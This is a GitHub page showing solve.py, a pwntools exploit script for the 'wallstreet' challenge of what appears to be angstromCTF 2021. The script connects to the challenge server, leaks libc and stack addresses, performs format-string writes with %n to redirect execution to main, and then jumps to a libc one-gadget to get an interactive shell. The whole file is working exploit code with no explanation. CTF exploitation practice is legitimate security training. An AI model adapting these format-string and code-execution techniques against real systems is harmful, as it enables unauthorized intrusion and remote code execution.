-
Notifications
You must be signed in to change notification settings - Fork 24
/
solve.py
61 lines (45 loc) · 1.28 KB
/
solve.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
#!/usr/bin/env python3
from pwn import *
exe = ELF("./wallstreet")
libc = ELF("./libc-2.32.so")
ld = ELF("./ld-2.32.so")
context.binary = exe
def conn():
return process(exe.path, env={"LD_PRELOAD": libc.path})
remotely = 1
if not remotely:
r = conn()
else:
r = remote("pwn.2021.chall.actf.co", 21800)
def init_leak(leak):
r.recv()
r.sendline("1")
r.recv()
r.sendline(str(leak))
if remotely:
r.recvuntil("What stonk do you want to see?")
r.recvline()
leak = u64(r.recvline().strip().ljust(8, p8(0)))
return leak
def main():
leak = init_leak(-16)
log.warn("Leak @ 0x%x", leak)
libc.address = leak - libc.sym['_IO_2_1_stdout_']
log.warn("Libc base @ 0x%x", libc.address)
r.recv()
payload = b"%"+str(0x2+0x2d6+0x100).encode() + b"c%100$n"
payload = payload.ljust(0x110, p8(0))
payload += p64(exe.sym['main'])
r.sendline(payload)
leak = init_leak(-32)
log.warn("Stack leak @ 0x%x", leak)
o = libc.address + 0xdf54c
payload = f"%{0x52}$n%{(leak & 0xffff)-0x38}c%{0x30}$hn"
payload = payload.ljust(0x20, "\x00")
payload = payload.encode()
padd = p64(o)*(0x110//8)
payload += padd
r.send(payload)
r.interactive()
if __name__ == "__main__":
main()